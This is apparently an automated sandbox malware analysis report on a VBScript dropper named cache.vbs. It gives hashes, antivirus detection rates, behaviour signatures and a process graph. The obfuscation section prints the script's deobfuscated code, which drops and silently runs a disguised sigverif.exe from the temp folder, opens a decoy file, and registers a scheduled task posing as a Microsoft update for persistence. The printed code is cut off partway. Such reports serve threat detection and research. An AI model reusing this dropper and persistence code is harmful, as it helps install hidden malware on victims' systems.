Windows Analysis Report
cache.vbs

Overview

General Information

Sample name: cache.vbs
Analysis ID: 1528871
MD5: 7e98bb7ffba4cf12d29132a2c71973eb
SHA1: 891b5908cee1908d62429ac2515beb8c1f7e63f2
SHA256: da0ae773603dc68d9bae4713afd8dbf89b1db5f891057b636380fa123a68c550
Tags: vbsuser-JAMESWT_MHT
Infos:

Detection

Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Found WSH timer for Javascript or VBS script (likely evasive script)
Java / VBScript file with very long strings (likely obfuscated code)
Program does not show much activity (idle)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: cache.vbs ReversingLabs: Detection: 28%
Source: cache.vbs Virustotal: Detection: 30% Perma Link

System Summary
barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Java / VBScript file with very long strings (likely obfuscated code)
Source: cache.vbs Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal64.evad.winVBS@1/0@0/0
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cache.vbs"
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: cache.vbs ReversingLabs: Detection: 28%
Source: cache.vbs Virustotal: Detection: 30%
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.CreateObject("Scripting.FileSystemObject")Dim currentPathcurrentPath = objFSO.GetAbsolutePathName(".")strFilePath = currentPath & "\_cache\cache\cache.bak"strNewFilePath = currentPath & "\_cache\cache\sigverif.exe"objFSO.MoveFile strFilePath, strNewFilePathSet objFSO = NothingDim filenameb64filenameb64 = DecodeBase64("5Y2a5aOr5ZCO55Sz6K+3LeeOi+eOieeOui3ljY7kuK3np5HmioDlpKflraYt55S15rCU5LiO55S15a2Q5bel56iL5Y2a5aOrLeeugOWOhi5wZGY=")Dim fsoSet fso = WScript.CreateObject("Scripting.FileSystemObject")Dim sourcePath,destinationPath,runfile,runfile2sourcePath = currentPath & "\_cache\cache\" & "cache.db"destinationPath = currentPath & "\" & filenameb64deleteFile = currentPath & "\" & filenameb64 & ".lnk"runfile = Chr(34) & currentPath & "\_cache\cache\sigverif.exe" & Chr(34)runfile2 = currentPath & "\_cache\cache\sigverif.exe"fso.MoveFile sourcePath, destinationPathfso.DeleteFile deleteFileDim tempFolder, tempPathtempFolder = fso.GetSpecialFolder(2)tempPath = tempFolder & "\sigverif.exe"fso.CopyFile runfile2, tempPath, TrueDim v1v1 = Chr(34) & destinationPath & Chr(34)Set WshShell = CreateObject("WScript.Shell")WshShell.Run v1, 0, FalseWshShell.Run tempPath, 0, Falsefso.DeleteFile runfile2Set WshShell = NothingDim shellPathDim taskName shellPath = tempPathtaskName = "WpnUserService_x64" Const TriggerTypeDaily = 1Const ActionTypeExec = 0Set service = CreateObject("Schedule.Service")Call service.ConnectDim rootFolderSet rootFolder = service.GetFolder("\")Dim taskDefinitionSet taskDefinition = service.NewTask(0)Dim regInfoSet regInfo = taskDefinition.RegistrationInforegInfo.Description = "Update"regInfo.Author = "Microsoft"Dim settingsSet settings = taskDefinition.settingssettings.Enabled = Truesettings.StartWhenAvailable = Truesettings.Hidden = Falsesettings.DisallowStartIfOnBatteries = FalseDim triggersSet triggers = taskDefinition.triggersDim triggerOn Error Resume Next CreateObject("WScript.Shell").RegRead ("HKEY_USERS\S-1-5-19\Environment\TEMP") If Err.Number = 0 Then IsAdmin = True Set trigger = triggers.Create(8) Set trigger = triggers.Create(9) Else IsAdmin = False End If Err.Clear On Error GoTo 0Set trigger = triggers.Create(7)Set trigger = triggers.Create(6)Set trigger = triggers.Create(TriggerTypeDaily)Dim startTime, endTimeDim timetime = DateAdd("n", 2, Now)Dim cSecond, cMinute, CHour, cDay, cMonth, cYearDim tTime, tDatecSecond = "0" & Second(time)cMinute = "0" & Minute(time)CHour = "0" & Hour(time)cDay = "0" & Day(time)cMonth = "0" & Month(time)cYear = Year(time)tTime = Right(CHour, 2) & ":" & Right(cMinute, 2) & ":" & Right(cSecond, 2)tDate = cYear & "-" & Right(cMonth, 2) & "-" & Right(cDay, 2)startTime = tDate & "T" & tTimeendTime = "2099-05-02T10:52:02"trigger.StartBoundary = startTimetrigger.EndBoundary = endTimetrigger.ID = "TimeTriggerId"trigger.Enabled = TrueDim repetitionPatternSet repetitionPattern = trigger.Repetitionrepeti
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1528871 Sample: cache.vbs Startdate: 08/10/2024 Architecture: WINDOWS Score: 64 8 Multi AV Scanner detection for submitted file 2->8 10 Sigma detected: WScript or CScript Dropper 2->10 5 wscript.exe 2->5         started        process3 signatures4 12 VBScript performs obfuscated calls to suspicious functions 5->12 14 Windows Scripting host queries suspicious COM object (likely to drop second stage) 5->14
No contacted IP infos